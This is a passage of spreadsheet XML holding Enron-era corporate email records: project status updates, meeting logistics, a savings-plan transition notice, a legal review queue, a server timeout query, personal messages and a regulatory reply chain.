Businesses Are Creating Wealth in the New Economy (May 2000, Boulton, Libert, _x000D_
Samek - Arthur Andersen).  _x000D_
_x000D_
Should you like more information on the Lab, previous meeting, book or other, _x000D_
please feel free to contact me._x000D_
_x000D_
I look forward to meeting you._x000D_
Regards,_x000D_
Amy Oberg_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 17 Apr 2001 18:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'stephen.stock@enron.com'})</t>
  </si>
  <si>
    <t>RE: GTV weekly status update</t>
  </si>
  <si>
    <t xml:space="preserve">Louise,_x000D_
_x000D_
attached is a plan for the roll-out of Windows 2000 for the trading groups for which TIBCO 6.x has been scripted._x000D_
_x000D_
 _x000D_
Richard Burchfield and I are currently investigating the state of TIBCO 5.x on the Windows NT 4.0 plaftorm that is still being used, and will get back to you when we have determined if the TIBCO 6.x solution can be incorprated into a script before the actual roll-out of Win2k._x000D_
_x000D_
regards_x000D_
_x000D_
Steve_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Kitchen, Louise  _x000D_
Sent:	Tuesday, April 17, 2001 11:47 AM_x000D_
To:	Wei, Zhiyong_x000D_
Cc:	Storey, Geoff; Bibi, Philippe A.; Perlman, Beth; Stock, Stephen; Sullivan, Colleen_x000D_
Subject:	Re: GTV weekly status update_x000D_
_x000D_
Who is responsible for the upgrade and do we have a plan in place to implement this?_x000D_
_x000D_
_x000D_
From:	Zhiyong Wei/ENRON@enronXgate on 04/16/2001 06:30 PM_x000D_
To:	Louise Kitchen/HOU/ECT@ECT, Geoff Storey/HOU/ECT@ECT, Philippe A Bibi/ENRON@enronXgate, Beth Perlman/ENRON@enronXgate, Stephen Stock/ENRON@enronXgate, Colleen Sullivan/HOU/ECT@ECT_x000D_
cc:	 _x000D_
_x000D_
Subject:	GTV weekly status update_x000D_
_x000D_
Please find below the GTV project status update for this week. Please see the attached file for the project timeline update in Microsoft Project._x000D_
_x000D_
GTV status meeting attendees:  Zhiyong Wei, Karima Husain, Francis Lim, Jeremy Wong, Bill Fortney, Nayan Dattani, Dave Nommensen, Russ Severson, Narasim Kasaru, Mike Swaim, George Grant, Chuck Ames, Geof Storey._x000D_
_x000D_
Accomplishments:_x000D_
?	Incorporating physical deal positions in TDS:_x000D_
o	Changes to CPR reader process and its unit testing have been completed._x000D_
o	Changes for the view aggregation and its unit testing have been completed._x000D_
o	A new task has been added due to the requirement of loading prior-day curves into Position Manager (Please see the attached project timeline.)_x000D_
o	Changes for Position Manager are in progress (Please see the attached project timeline.)_x000D_
?	Single point of deal entry for term deals:_x000D_
o	Single point of deal entry is now ready for user acceptance testing._x000D_
?	Gas Daily deals:_x000D_
o	Changes to ERMS PortCalc application for the Gas Daily deals are complete and ready for testing._x000D_
o	Changes to TDS deal valuation are in progress and on schedule (please see the attached project timeline.)_x000D_
o	A new task has been added to flag fixed-price positions (please see the attached project timeline.)_x000D_
?	Live feeds for Gas Daily/intra-month curves:_x000D_
o	Released to production_x000D_
_x000D_
Plans for the week ending 4/20/01:_x000D_
?	Continue IT development of Phase I items._x000D_
?	Obtain sign-off for GTV-II, Phase 2 issues and timeline._x000D_
?	Commence IT development of Phase 2 issues._x000D_
_x000D_
Issues:_x000D_
Incompatibility of TIBCO version 5.x and 6.x. The single point of deal entry is done using TIBCO 6.x. Some users are still using TIBCO 5.x. Upgrading to either TIBCO 6.x or Windows 2000 is needed._x000D_
_x000D_
 &lt;&lt; File: GTV2 4-16-01.mpp &gt;&gt; _x000D_
Thanks_x000D_
_x000D_
Zhiyong_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 22 Jan 2002 08:52:14 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rick.buy@enron.com', 'raymond.bowen@enron.com'})</t>
  </si>
  <si>
    <t>Finance Comm. Mtg. on 2/11</t>
  </si>
  <si>
    <t xml:space="preserve">Rather than hold a meeting to discuss the Finance Comm. meeting scheduled for Monday, Feb. 11, I have asked Laura Valencia to schedule a conference call with Pug Winokur and the three of us to discuss the agenda and the presentation materials.  Please watch for this meeting on your calendar, or let me know if you have already been in contact with Pug such that no meeting is necessary.  _x000D_
_x000D_
Also, pls. note that the Board and Committee meetings will be held in NYC.  If you do not have other reasons to travel to NYC, I suggest you connect via teleconference.  _x000D_
_x000D_
Thanks.  Paula_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 25 Feb 2002 13:20:47 -0800 (PST)</t>
  </si>
  <si>
    <t>dont know, sorry_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hayden, Frank  _x000D_
Sent:	Monday, February 25, 2002 3:20 PM_x000D_
To:	Parks, Joe_x000D_
Subject:	RE: _x000D_
_x000D_
What is Lynnette's last name?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Parks, Joe  _x000D_
Sent:	Monday, February 25, 2002 3:18 PM_x000D_
To:	Hayden, Frank_x000D_
Subject:	RE: _x000D_
_x000D_
_x000D_
Lynnette		310-789-2317	_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hayden, Frank  _x000D_
Sent:	Monday, February 25, 2002 3:15 PM_x000D_
To:	Parks, Joe_x000D_
Subject:	_x000D_
_x000D_
Do you know anyone at Cook Inlet?  My analyst is looking for work on west coast</t>
  </si>
  <si>
    <t>Mon, 14 May 2001 09:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>yeah, paincourtville, la.  i don't know where the fuck that is.</t>
  </si>
  <si>
    <t>Tue, 19 Sep 2000 03:47:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>HPL Nom for Sept. 20,2000</t>
  </si>
  <si>
    <t>(See attached file: hpl0920.xls)_x000D_
_x000D_
 - hpl0920.xls</t>
  </si>
  <si>
    <t>Thu, 25 Oct 2001 21:43:45 -0700 (PDT)</t>
  </si>
  <si>
    <t>IMPORTANT-To All Domestic Employees who Participate in the Enron_x000D_
 Corp Savings Plan</t>
  </si>
  <si>
    <t>_x000D_
If you are a participant in the Enron Corp. Savings Plan, please read this very important message._x000D_
_x000D_
We understand that you are concerned about the timing of the move to a new Savings Plan administrator and the restricted access to your investment funds during the upcoming transition period scheduled to take place beginning at 3:00PM CST on October 26 and ending at 8:00AM CST on November 20.  _x000D_
_x000D_
We have been working with Hewitt and Northern Trust since July.  We understand your concerns and are committed to making this transition period as short as possible without jeopardizing the reconciliation of both the Plan in total or your account in particular.  _x000D_
_x000D_
Remember that the Enron Corp. Savings Plan is an investment vehicle for your long-term financial goals.  The Enron plan will continue to offer a variety of investment opportunities with different levels of risk.  _x000D_
_x000D_
As always, we advise you to review your overall investment strategy and carefully weigh the potential earnings of each investment choice against its risk before making investment decisions that are aligned with your long-term financial plans and your risk tolerance. _x000D_
_x000D_
For that reason, it is critical that ALL trades among your investment funds be completed by 3:00 PM CST Friday, October 26 before the transition period begins.</t>
  </si>
  <si>
    <t>Thu, 27 Sep 2001 13:24:25 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'claudia.clark@enron.com'})</t>
  </si>
  <si>
    <t>FW: Work queue - pending items for US Legal review</t>
  </si>
  <si>
    <t>_x000D_
Hi Tana,_x000D_
There are four more companies pending reviewing._x000D_
_x000D_
Superiorgas Energy, LLC_x000D_
Commonwealth Energy Corp._x000D_
Sara Lee, Corporation_x000D_
Canadian Niagara Power Company Limited ( New )_x000D_
_x000D_
Thank you,_x000D_
Claudia _x000D_
 -----Original Message-----_x000D_
From: 	Sever, Stephanie  _x000D_
Sent:	Tuesday, September 25, 2001 1:21 PM_x000D_
To:	Jones, Tana_x000D_
Cc:	Clark, Claudia_x000D_
Subject:	Work queue - pending items for US Legal review_x000D_
_x000D_
Tana,_x000D_
_x000D_
I have reviewed the work queue for items pending US Legal review - hope this helps._x000D_
_x000D_
AS Industries Inc. - Can &amp; US Gas_x000D_
AltaGas Services Inc. - Can Gas_x000D_
Ameren Energy Fuels... - full review_x000D_
Ameren Energy Fuels... -full review_x000D_
Ameren Energy Fuels... - full review_x000D_
Aspect Resources, LLC - us Crude_x000D_
BP Energy Company - US East Power_x000D_
Cargill, Inc. - Us Heating OIl_x000D_
Colonial Energy Inc. - Us Crude &amp; Heating Oil_x000D_
Conectiv Enegy Supply, Inc. - US East Power_x000D_
Cox &amp; Perkins Exploration, Inc. - US Crude_x000D_
Crosstex Energy Services, LTD - US Gas_x000D_
Duke Energy Field Services Marketing, LLC - US Gas_x000D_
Eagle Gas Marketing Company - US Gas_x000D_
El Paso Merchant Energy, LP - US East Power_x000D_
Enserco Energy, Inc. - US Gas/HeatingOIl_x000D_
Exxon Mobil Corporation - US East Power_x000D_
Forest Oil Corp. - US Crude_x000D_
Georgia Gulf Corp. - US Crude - HeatingOil_x000D_
IDACORP Energy LP - US West Power_x000D_
Ispat Inland, Inc. - US Gas_x000D_
Itochu Marine Co. Ltd - US Crude/Heating Oil_x000D_
Japan Energy Corp. - US Crude / Heating Oil_x000D_
Louis Dreyfus Corp. - US East Power_x000D_
Lyondell-Citgo Refining Company LP - US Crude/Heating OIl_x000D_
MarkWest Hydrocarbon, Inc. - Us Crude/Heating OIl_x000D_
McMoran Exploration Co.  - Us Crude_x000D_
Merrill Lynch Capital Services, Inc. - Us East Power_x000D_
MidAmerican Energy Company - US East Power_x000D_
Mitchell Gas Services LP - US Crude_x000D_
Morgan Stanley Capital Group - Us East Power_x000D_
NG Energy Trading LLC - US Crude/Heating Oil_x000D_
National Fuel Marketing Company, LLC - US Gas_x000D_
Northstar Interest - full review_x000D_
PanCanadian Energy Services Inc. - US Gas_x000D_
Petrobras America Inc. - Us heating. Mtbe. Unl Gas_x000D_
Preussag North America, Inc. - US Steel_x000D_
Public Utility Dist #1 of Douglas County - full review_x000D_
Pursuit Resources Corp. - US Crude_x000D_
Reliant Energy Services, Inc. - US East Power_x000D_
Select Energy Inc. - Can &amp; US Gas_x000D_
Seminole Electric Coop. - full review_x000D_
Sempra Energy Trading Corp. - Us Gas_x000D_
Shenandoah Energy, Inc. - US Crude/Heating Oil_x000D_
Smith BarneyAAAEnergy Fund - US Crude/Heating OIl_x000D_
Texla Energy Management Inc. - US Gas/Can Gas_x000D_
Virginia Power Energy Marketing - Can/US Gas_x000D_
WilliamsEnergy Marketing &amp; Trading - Us East Power_x000D_
_x000D_
 _x000D_
_x000D_
Thank you,_x000D_
_x000D_
Stephanie Sever_x000D_
EnronOnline_x000D_
713-853-3465</t>
  </si>
  <si>
    <t>Thu, 17 Feb 2000 08:26:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: El Paso-Assignment of EOL Physical Natural Gas Transactions</t>
  </si>
  <si>
    <t>Oh, you little sweet talker...!</t>
  </si>
  <si>
    <t>Re: Irena</t>
  </si>
  <si>
    <t xml:space="preserve">I'll be there._x000D_
_x000D_
Errol_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Jeffrey C Gossett@ECT_x000D_
04/25/2001 05:04 PM_x000D_
To: David Baumbach/HOU/ECT@ECT, Kam Keiser/HOU/ECT@ECT, Phillip M _x000D_
Love/HOU/ECT@ECT, Darron C Giron/HOU/ECT@ECT, Russ Severson/HOU/ECT@ECT, John _x000D_
Valdes/HOU/ECT@ECT, Errol McLaughlin/Corp/Enron@ENRON, Martha _x000D_
Stevens/HOU/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Irena_x000D_
_x000D_
We got Irena a day at the spa during the week.  And for those of you that are _x000D_
here on Friday,  I would like to take her to lunch as well._x000D_
_x000D_
Let me know if you are coming._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 25 Apr 2002 06:59:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: StatServer Administration</t>
  </si>
  <si>
    <t xml:space="preserve">Mark,_x000D_
_x000D_
I did not get the password. David Miller and John Lapham said, they will _x000D_
create a user with administrative privilege, _x000D_
which I can use for administration. In the meantime I will come to your desk _x000D_
to take a look at the problem._x000D_
_x000D_
Thanks_x000D_
_x000D_
Rabi_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Mark Fisher_x000D_
04/25/2002 01:44 PM_x000D_
To: Rabi Sahoo/EWC/Enron@ENRON_x000D_
cc: Patricia Hunter/EWC/Enron@ENRON, Hollis Kimbrough/EWC/Enron@ENRON _x000D_
_x000D_
Subject: StatServer Administration_x000D_
_x000D_
Rabi,_x000D_
_x000D_
I have done some further exploration of the timeout problem on the _x000D_
StatServer. I have tested the ASP page timeout and that does appear to exceed _x000D_
5 minutes. Therefore the problem may be in the statserver configuration. _x000D_
There is a setting labeled "Request Timeout interval" that might be causing _x000D_
the problem. If it is set for 5 minutes that would explain the problem. _x000D_
_x000D_
Have you been able to get the new administrator password so that you can look _x000D_
at how the software is configured?_x000D_
_x000D_
If this is not the problem could there be something limiting how long the _x000D_
connection to Oracle remains open?_x000D_
_x000D_
Anyway, a couple of more ideas._x000D_
_x000D_
Mark_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 10 Apr 2001 10:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'rahil.jafry@enron.com', 'beth.apollo@enron.com'})</t>
  </si>
  <si>
    <t>SAP Licensing</t>
  </si>
  <si>
    <t xml:space="preserve">Heard from Allan Sommer today regarding the SAP licensing question:_x000D_
_x000D_
? We do not need to amend our current SAP license agreement for the _x000D_
outsourcing project as long as we are the caretakers of the data, i.e. _x000D_
outside entities do not  access data within our environment, but rather _x000D_
access an extract of the data from it.  This should work well with the _x000D_
current plan._x000D_
_x000D_
Allan further suggested that we keep Kathy Kokas from his group posted on our _x000D_
effort, in case our plan changes.  He also mentioned that their group may be _x000D_
helpful in other ways._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Fred Philipson_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 16 Apr 2001 03:24:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: draft Master Agreement - Brazil</t>
  </si>
  <si>
    <t xml:space="preserve">As an alternative, I will be in Houston April 30 and May 1 &amp;2 before going to _x000D_
San Antonio.  Your call._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
From: Elizabeth Sager@ECT on 04/16/2001 08:18 AM CDT_x000D_
To: Sami Arap/SA/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: draft Master Agreement - Brazil  _x000D_
_x000D_
I'm sorry I thought you might still be here.  I'm travelling the rest of this _x000D_
week so how about April 24th or 25th next week?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 15 Nov 2000 01:18:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Wisconsin</t>
  </si>
  <si>
    <t>please give me a call when time permits_x000D_
_x000D_
_x000D_
Debra Perlingiere_x000D_
Enron North America Corp._x000D_
Legal Department_x000D_
1400 Smith Street, EB 3885_x000D_
Houston, Texas 77002_x000D_
dperlin@enron.com_x000D_
Phone 713-853-7658_x000D_
Fax  713-646-3490</t>
  </si>
  <si>
    <t>Wed, 20 Sep 2000 10:30:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Here is Pastoria for now!_x000D_
_x000D_
_x000D_
_x000D_
Thanks_x000D_
</t>
  </si>
  <si>
    <t>Thu, 30 Nov 2000 05:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'elizabeth.sager@enron.com', 'richard.b.sanders@enron.com'})</t>
  </si>
  <si>
    <t>PCA/FERC Briefs</t>
  </si>
  <si>
    <t xml:space="preserve">I have a full set of the briefs filed in the DC Circuit regarding the FERC_x000D_
notice issue raised by PCA.  I assume Enron's regulatory counsel, LeBoeuf,_x000D_
Lamb, has provided you with a set. If, however, you'd like me to send a_x000D_
complete set over, just let me know.  Thanks._x000D_
_x000D_
_x000D_
_x000D_
**********NOTE**********_x000D_
The information contained in this email message is intended only_x000D_
for use of the individual or entity named above.  If the reader_x000D_
of this message is not the intended recipient, or the employee or_x000D_
agent responsible to deliver it to the intended recipient, you_x000D_
are hereby notified that any dissemination, distribution or_x000D_
copying of this communication is strictly prohibited.  If you_x000D_
have received this communication in error, please immediately_x000D_
notify us by telephone (713-546-5000), and destroy the original_x000D_
message. Thank you._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 30 Apr 2001 18:56:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'hal945@swbell.net'})</t>
  </si>
  <si>
    <t>OTC</t>
  </si>
  <si>
    <t xml:space="preserve"> www.globaltradedays.com_x000D_
Welcomes OTC Attendees_x000D_
_x000D_
Please visit our website for the BEST networking tool of the year._x000D_
_x000D_
_ You can E-Mail directly from our searchable database (both U.S. &amp;_x000D_
International Offshore Oil and Gas Company contacts) as well as the Offshore_x000D_
Technology 2000 attendees. www.globaltradedays.com then click on bottom_x000D_
right-hand corner for easy searching or simply download the list of over_x000D_
10,000 of last year's attendees in Adobe Acrobat Reader format._x000D_
_x000D_
_ While in downtown Houston, come to our cyber-caf, for a cappuccino or a_x000D_
cup of coffee at 2 Allen Center 1200 Smith St. Suite 1600 and check your_x000D_
E-Mail in comfort._x000D_
_x000D_
_ To learn more about how Global Trade Days can help you grow your business,_x000D_
give Hal McClure a call at 713-353-3916_x000D_
Or E-Mail 103636.2203@compuserve.com_x000D_
_x000D_
Network with the Best ! www.globaltradedays.com_x000D_
</t>
  </si>
  <si>
    <t>Mon, 4 Dec 2000 09:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Holiday Vacation</t>
  </si>
  <si>
    <t>Jeff Richter</t>
  </si>
  <si>
    <t>I realize this is late notice, but it just occurred to me that I never _x000D_
discussed my Christmas vacation plans with you when I transferred into _x000D_
Trading. I have a family trip planned and paid for, so I hope it won't cause _x000D_
too much chaos if I'm gone. I understand the tendency for people to feel lost _x000D_
and helpless without me._x000D_
_x000D_
I'm supposed to be in California with my dad on Dec. 22, then in Mexico with _x000D_
my mom from Dec. 26 to Jan. 2. So I basically need to miss four days of work. _x000D_
Again, I'm sorry to bring this to you so late, and I'd be glad to do any _x000D_
amount of work before or after, or even spend my holiday entering deals on _x000D_
the computer in some exotic Central American internet cafe. I've heard _x000D_
they're great places to rage._x000D_
_x000D_
We can discuss the logistics when you're back in the office. And by the way, _x000D_
the flame in this e-mail does not indicate anger, but rather is meant to be a _x000D_
festive, joyous, holiday-time explosion._x000D_
_x000D_
Kate</t>
  </si>
  <si>
    <t>Tue, 27 Jun 2000 02:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Updated July FOM Volumes</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Chris Germany/HOU/ECT on 06/27/2000 09:19 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
dkinney@columbiaenergygroup.com on 06/26/2000 05:37:36 PM_x000D_
To: " - *Kevin.Ruscitti@enron.com" &lt;Kevin.Ruscitti@enron.com&gt;, " - _x000D_
*chris.germany@enron.com" &lt;chris.germany@enron.com&gt;_x000D_
cc: " - *Molly.Johnson@enron.com" &lt;Molly.Johnson@enron.com&gt;, " - *Dalphon, _x000D_
Charles" &lt;cdalpho@columbiaenergygroup.com&gt;, " - *Scott, David" _x000D_
&lt;dscott1@columbiaenergygroup.com&gt;, " - *Bizik, Kim" _x000D_
&lt;knovsek@columbiaenergygroup.com&gt;, " - *Jones, Donna" _x000D_
&lt;djones1@columbiaenergygroup.com&gt;, " - *Destephanis, Kara" _x000D_
&lt;kdestep@columbiaenergygroup.com&gt;, " - *Boyd, Heidi" _x000D_
&lt;hboyd@columbiaenergygroup.com&gt;, " - *cfrankl2@enron.com" _x000D_
&lt;cfrankl2@enron.com&gt;, " - *joan.veselack@enron.com" _x000D_
&lt;joan.veselack@enron.com&gt;, " - *vversen@enron.com" &lt;vversen@enron.com&gt;, " - _x000D_
*cindy.vachuska@enron.com" &lt;cindy.vachuska@enron.com&gt;, " - _x000D_
*cora_pendergrass@enron.com" &lt;cora_pendergrass@enron.com&gt;, " - _x000D_
*mmitche2@enron.com" &lt;mmitche2@enron.com&gt;, " - *scott.goodell@enron.com" _x000D_
&lt;scott.goodell@enron.com&gt;, " - *steve.gillespie@enron.com" _x000D_
&lt;steve.gillespie@enron.com&gt;, " - *cgarcia@enron.com" &lt;cgarcia@enron.com&gt;, " - _x000D_
*despey@enron.com" &lt;despey@enron.com&gt;, " - *joann.collins@enron.com" _x000D_
&lt;joann.collins@enron.com&gt; _x000D_
Subject: Updated July FOM Volumes_x000D_
_x000D_
_x000D_
The attached file contains updated July 2000 volume requirements for CES.  The_x000D_
changes relative to the original request sent on 6/23/00.   Changes are_x000D_
described on the worksheet labelled 'Comments' under the date 06/26/00.   The_x000D_
only other change that I currently anticipate is to NIPSCO when they post our_x000D_
July requirements on their EBB._x000D_
_x000D_
Please call me if you have questions, etc._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Doug Kinney_x000D_
Ph:  703-561-6339_x000D_
Fax:  703-561-7317_x000D_
_x000D_
 - July00_FOM_Req02.xls_x000D_
</t>
  </si>
  <si>
    <t>Tue, 5 Dec 2000 18:42:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mleslie@amgen.com'})</t>
  </si>
  <si>
    <t>Re: Fiesta Bowl</t>
  </si>
  <si>
    <t>Dude I hear you are going to be in town this weekend.  Unfortunately I will _x000D_
be gone, I am going to SF to hang with Burnsy as i have a six day break from _x000D_
work.  I will however, be back in town on Sunday night.  If you are going to _x000D_
be in town  still maybe we could grab a beer late sunday night (I don't get _x000D_
in until 10) or grab lunch on Monday as I don't work monday.  Give me a call _x000D_
on my cell and let me know.  Oh, by the way i will be going out with the one _x000D_
and only Marc Johnson for some beers in the city on Friday night.  He is in _x000D_
the country for a month.  If you want to have a chat with the man give us a _x000D_
call that night 503-702-0463.  Take care buddy and happy holidays!  Oh yeah, _x000D_
what is your address. I am sending out some x-mas cards.</t>
  </si>
  <si>
    <t>Mon, 11 Dec 2000 03:39:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'burkee@cts.com'})</t>
  </si>
  <si>
    <t>frozenset({'rochmanm@spurr.org', 'tomb@crossborderenergy.com', 'michael.alexander@sce.com'})</t>
  </si>
  <si>
    <t>Re: Proposed revisions to CSA Letter</t>
  </si>
  <si>
    <t>You'll see that point in WHP's own comments as well, so we recommend it stay_x000D_
in as well._x000D_
_x000D_
John_x000D_
_x000D_
BETA Consulting_x000D_
Burkee@cts.com_x000D_
(760) 723-1831 Voice_x000D_
(760) 723-1891 FAX_x000D_
----- Original Message -----_x000D_
From: Tom Beach &lt;tomb@crossborderenergy.com&gt;_x000D_
To: &lt;Michael.Alexander@sce.com&gt;; Michael Rochman &lt;rochmanm@spurr.org&gt;_x000D_
Cc: 'Skaff, Andy@Dynegy' &lt;askaff@chrm.com&gt;; 'Dingwall, Brian@UEM'_x000D_
&lt;bdingwall@unitedgas.com&gt;; 'John Burkholder' &lt;burkee@cts.com&gt;; 'Jun,_x000D_
Christine@aelaw' &lt;chj@aelaw.com&gt;; 'Rick Counihan, Greenmountain.com'_x000D_
&lt;counihan@greenmountain.com&gt;; 'Craig Chancellor' &lt;craigc@calpine.com&gt;;_x000D_
'Bayless, David@Utility' &lt;david.bayless@utility.com&gt;; 'Elsesser,_x000D_
Evelyn@aelaw' &lt;eke@aelaw.com&gt;; 'Worster, Gerard@TXU'_x000D_
&lt;gworster@txuenergy.com&gt;; 'Jeff Dasovich' &lt;jdasovic@enron.com&gt;;_x000D_
&lt;Jeff.Dasovich@enron.com&gt;; 'Jeff Fawcett, Transwestern'_x000D_
&lt;jfawcett@enron.com&gt;; &lt;jleslie@LUCE.com&gt;; 'Paul, Joe@Dynegy'_x000D_
&lt;joe.paul%dynegy@sce.com&gt;; 'Johnson, Pamela@REMAC'_x000D_
&lt;johnson_pamela@lacoe.edu&gt;; 'Karp, Joseph@Whitecase'_x000D_
&lt;karpjos@sf.whitecase.com&gt;; 'McCrea, Keith@CIG/CM' &lt;kmccrea@sablaw.com&gt;;_x000D_
&lt;kmills@CFBF.com&gt;; 'How-Downing, Lindsey' &lt;Lindseyhowdowning@dwt.com&gt;; 'MBD'_x000D_
&lt;MDay@GMSSR.com&gt;; 'Paul Amirault' &lt;PaulAmirault@aec.ca&gt;; 'Phil_x000D_
Sent: Monday, December 11, 2000 11:34 AM_x000D_
Subject: Re: Proposed revisions to CSA Letter_x000D_
_x000D_
_x000D_
&gt; I support putting back some more about how we have been jerked around_x000D_
&gt; prcedurally._x000D_
&gt;_x000D_
&gt;_x000D_
&gt; ----- Original Message -----_x000D_
&gt; From: &lt;Michael.Alexander@sce.com&gt;_x000D_
&gt; To: Michael Rochman &lt;rochmanm@spurr.org&gt;_x000D_
&gt; Cc: 'Mike Alexander' &lt;alexanms@sce.com&gt;; 'Skaff, Andy@Dynegy'_x000D_
&gt; &lt;askaff@chrm.com&gt;; 'Dingwall, Brian@UEM' &lt;bdingwall@unitedgas.com&gt;; 'John_x000D_
&gt; Burkholder' &lt;burkee@cts.com&gt;; 'Jun, Christine@aelaw' &lt;chj@aelaw.com&gt;;_x000D_
'Rick_x000D_
&gt; Counihan, Greenmountain.com' &lt;counihan@greenmountain.com&gt;; 'Craig_x000D_
&gt; Chancellor' &lt;craigc@calpine.com&gt;; 'Bayless, David@Utility'_x000D_
&gt; &lt;david.bayless@utility.com&gt;; 'Elsesser, Evelyn@aelaw' &lt;eke@aelaw.com&gt;;_x000D_
&gt; 'Worster, Gerard@TXU' &lt;gworster@txuenergy.com&gt;; 'Jeff Dasovich'_x000D_
&gt; &lt;jdasovic@enron.com&gt;; &lt;Jeff.Dasovich@enron.com&gt;; 'Jeff Fawcett,_x000D_
&gt; Transwestern' &lt;jfawcett@enron.com&gt;; &lt;jleslie@LUCE.com&gt;; 'Paul, Joe@Dynegy'_x000D_
&gt; &lt;joe.paul%dynegy@sce.com&gt;; 'Johnson, Pamela@REMAC'_x000D_
&gt; &lt;johnson_pamela@lacoe.edu&gt;; 'Karp, Joseph@Whitecase'_x000D_
&gt; &lt;karpjos@sf.whitecase.com&gt;; 'McCrea, Keith@CIG/CM' &lt;kmccrea@sablaw.com&gt;;_x000D_
&gt; &lt;kmills@CFBF.com&gt;; 'How-Downing, Lindsey' &lt;Lindseyhowdowning@dwt.com&gt;;_x000D_
'MBD'_x000D_
&gt; &lt;MDay@GMSSR.com&gt;; 'Paul A_x000D_
&gt; Sent: Monday, December 11, 2000 11:13 AM_x000D_
&gt; Subject: RE: Proposed revisions to CSA Letter_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt; Mike,_x000D_
&gt; &gt;_x000D_
&gt; &gt; Edison can deal with the letter, either in it's pre-SoCalGas modified_x000D_
&gt; form,_x000D_
&gt; &gt; or with the SoCalGas edited letter.   Unless you hear otherwise from us,_x000D_
&gt; &gt; consider us signatories (using Doug Porter's name)._x000D_
&gt; &gt;_x000D_
&gt; &gt; However, I do agree with Michael Rochman that the SoCalGas version's_x000D_
&gt; &gt; comments on point five are a bit weaker than I would like.  It is more_x000D_
&gt; than_x000D_
&gt; &gt; a matter of having to duplicate the effort already expended, it is also_x000D_
a_x000D_
&gt; &gt; matter of having to justify that level of effort in light of a_x000D_
diminished_x000D_
&gt; &gt; perception (at least) of the chances of implementation of the results of_x000D_
&gt; &gt; that effort.  I would prefer that be indicated politely, but clearly._x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt; --_x000D_
&gt; &gt; Michael S. Alexander_x000D_
&gt; &gt; Southern California Edison_x000D_
&gt; &gt; 626-302-2029_x000D_
&gt; &gt; 626-302-3254 (fax)_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;                     Michael_x000D_
&gt; &gt;                     Rochman              To:     "'MBD'"_x000D_
&lt;MDay@GMSSR.com&gt;,_x000D_
&gt; "'Pocta, Robert_x000D_
&gt; &gt;                     &lt;rochmanm@spu        M.'" &lt;rmp@cpuc.ca.gov&gt;,_x000D_
&gt; "'Counihan, Rick'"_x000D_
&gt; &gt;                     rr.org&gt;_x000D_
&gt; &lt;rick.counihan@greenmountain.com&gt;,_x000D_
&gt; &gt;                                          "'Jeff.Dasovich@enron.com'"_x000D_
&gt; &gt;                     12/11/2000           &lt;Jeff.Dasovich@enron.com&gt;,_x000D_
"'John_x000D_
&gt; Burkholder'"_x000D_
&gt; &gt;                     10:57 AM             &lt;burkee@cts.com&gt;, "'Mike_x000D_
&gt; Alexander'"_x000D_
&gt; &gt;                                          &lt;alexanms@sce.com&gt;, "'Craig_x000D_
&gt; Chancellor'"_x000D_
&gt; &gt;                                          &lt;craigc@calpine.com&gt;, "'Colin_x000D_
&gt; Cushnie'"_x000D_
&gt; &gt;                                          &lt;cushnice@sce.com&gt;, "'Jeff_x000D_
&gt; Dasovich'"_x000D_
&gt; &gt;                                          &lt;jdasovic@enron.com&gt;, "'Paul_x000D_
&gt; Amirault'"_x000D_
&gt; &gt;                                          &lt;PaulAmirault@aec.ca&gt;, "'Doug_x000D_
&gt; Porter'"_x000D_
&gt; &gt;                                          &lt;porterdk@sce.com&gt;, "'Tom_x000D_
Beach'"_x000D_
&gt; &gt;                                          &lt;tomb@crossborderenergy.com&gt;,_x000D_
&gt; "'Amirault, Paul'"_x000D_
&gt; &gt;                                          &lt;PaulAmirault@aec.ca&gt;, "'Craig_x000D_
&gt; Chancellor,_x000D_
&gt; &gt;                                          Calpine'" &lt;craigc@calpine.com&gt;,_x000D_
&gt; "'How-Downing,_x000D_
&gt; &gt;                                          Lindsey'"_x000D_
